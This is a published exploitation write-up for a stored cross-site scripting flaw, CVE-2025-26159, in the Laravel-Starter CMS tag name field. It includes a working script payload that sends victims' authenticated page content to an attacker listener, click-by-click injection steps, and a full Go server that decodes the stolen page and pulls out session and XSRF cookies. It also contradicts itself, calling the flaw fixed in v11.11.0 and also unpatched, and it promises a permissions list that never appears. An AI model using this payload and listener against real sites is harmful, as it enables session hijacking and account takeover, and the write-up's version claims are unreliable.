CVE-2025-26159
CVE-2025-26159 Exploitation
Discovered by: Fernando González Perea
CVE-2025-26159 is a Stored Cross-Site Scripting (XSS) vulnerability in the Laravel-Starter CMS, specifically within the tag name field. This vulnerability allows an attacker to inject and execute malicious JavaScript code in the browsers of users who visit the affected tag details page.
The issue affects versions prior to v11.11.0. It arises because the tag name is stored without sanitization and later rendered into the tag details page without output encoding, so whatever HTML or script the attacker places in the field is delivered verbatim to every viewer.
An attacker can take advantage of this vulnerability to steal the cookies of users who view the tag by creating a tag with the following payload in the name field. The payload fetches the application root with the victim's credentials and then navigates the browser to the attacker's listener with the fetched page body `escape()`-encoded in the URL.

```html
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
```
Proof of Concept
To abuse this vulnerability we only need control over a user with the following permissions.
Now let's create the malicious tag. Logged in as that user, go to Admin Dashboard > Tags.
Inject the malicious payload into the "name" field and fill the remaining fields with arbitrary data.
```html
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
```
Once the tag has been created, any user who visits its details page will execute the JavaScript in their browser. To obtain their cookies we also need an HTTP server that receives the exfiltrated page content, URL-decodes it and searches it for the cookies. To make this easier, I wrote a script in Go that does all of this.
Finally, when the user clicks the "View details" button, we receive their cookies.
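The listener described above, written here as an added example: this is not the author's Go script and not code from the Laravel-Starter project. It assumes the `/d=` path format produced by the payload, a listener on 127.0.0.1:9000 (the payload's `127.1:9000`), and a set of cookie names to search for (`laravel_session`, `XSRF-TOKEN`), which is an assumption you should adjust to the target. One detail worth knowing: JavaScript's legacy `escape()` emits `%uXXXX` for characters outside Latin-1, and Go's `net/url` rejects such sequences, so a `net/http` server would answer 400 Bad Request before any handler ran; the example therefore reads the request line from a raw TCP connection and decodes it itself.

```go
package main

import (
	"bufio"
	"fmt"
	"log"
	"net"
	"regexp"
	"strconv"
	"strings"
	"unicode/utf16"
)

// sampleRequest is a constructed request line, not a real capture. It is what the
// payload sends for a victim page whose body is "<p>laravel_session=abc123; é</p>":
// escape() leaves "/" alone, encodes "<", ">", "=", ";" and space as %XX, "é" as %E9.
const sampleRequest = "GET /d=%3Cp%3Elaravel_session%3Dabc123%3B%20%E9%3C/p%3E HTTP/1.1"

// cookieNames lists the Laravel cookies searched for in the exfiltrated page.
// The names are an assumption for this example; adjust them to the target.
var cookieNames = regexp.MustCompile(`(?i)\b(laravel_session|XSRF-TOKEN)=([^;\s"'<&]+)`)

// unescapeJS reverses JavaScript's legacy escape(): "%XX" is a Latin-1 code point,
// "%uXXXX" a UTF-16 code unit (surrogate pairs are rejoined by utf16.Decode).
func unescapeJS(s string) string {
	units := make([]uint16, 0, len(s))
	for i := 0; i < len(s); {
		if s[i] == '%' && i+6 <= len(s) && s[i+1] == 'u' {
			if v, err := strconv.ParseUint(s[i+2:i+6], 16, 16); err == nil {
				units = append(units, uint16(v))
				i += 6
				continue
			}
		} else if s[i] == '%' && i+3 <= len(s) {
			if v, err := strconv.ParseUint(s[i+1:i+3], 16, 8); err == nil {
				units = append(units, uint16(v))
				i += 3
				continue
			}
		}
		units = append(units, uint16(s[i])) // unencoded ASCII, or a stray '%'
		i++
	}
	return string(utf16.Decode(units))
}

// extractPayload pulls the exfiltrated page out of a "GET /d=... HTTP/1.1" request
// line; the "/d=" prefix is the one the payload's location= URL produces.
func extractPayload(requestLine string) (string, bool) {
	fields := strings.Fields(requestLine)
	if len(fields) < 2 || fields[0] != "GET" || !strings.HasPrefix(fields[1], "/d=") {
		return "", false
	}
	return unescapeJS(strings.TrimPrefix(fields[1], "/d=")), true
}

// findCookies returns every "name=value" pair for the cookies of interest.
func findCookies(body string) []string {
	var found []string
	for _, m := range cookieNames.FindAllStringSubmatch(body, -1) {
		found = append(found, m[1]+"="+m[2])
	}
	return found
}

// handle reads one request line, answers at once so the victim's browser does not
// hang on the redirect, then logs what the page contained.
func handle(conn net.Conn) {
	defer conn.Close()
	line, err := bufio.NewReader(conn).ReadString('\n')
	if err != nil {
		return
	}
	fmt.Fprint(conn, "HTTP/1.1 204 No Content\r\nConnection: close\r\n\r\n")
	body, ok := extractPayload(strings.TrimRight(line, "\r\n"))
	if !ok {
		return
	}
	log.Printf("%s sent %d bytes of page", conn.RemoteAddr(), len(body))
	for _, c := range findCookies(body) {
		log.Printf("%s cookie: %s", conn.RemoteAddr(), c)
	}
}

func main() {
	// 127.1:9000 in the payload expands to 127.0.0.1:9000; in a real engagement the
	// payload and this address both point at a host the attacker controls.
	ln, err := net.Listen("tcp", "127.0.0.1:9000")
	if err != nil {
		log.Fatal(err)
	}
	for {
		conn, err := ln.Accept()
		if err != nil {
			log.Fatal(err)
		}
		go handle(conn)
	}
}
```

Because the payload redirects with `location=`, the whole page body travels in the request line, so very large pages can exceed the URL length a browser is willing to send; in that case only the front of the page arrives, and cookies embedded near the end of the HTML will be missed.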
As of the date of this publication, the vulnerability remains unpatched by the vendor.
Despite multiple attempts to responsibly disclose the issue, the developer has failed to respond or take action. This post is being published to raise awareness among users and administrators who rely on this software, so they can take appropriate mitigation steps on their own.
References
- https://nvd.nist.gov/vuln/detail/CVE-2025-26159
- https://www.cve.org/CVERecord?id=CVE-2025-26159
- https://github.com/nasirkhan/laravel-starter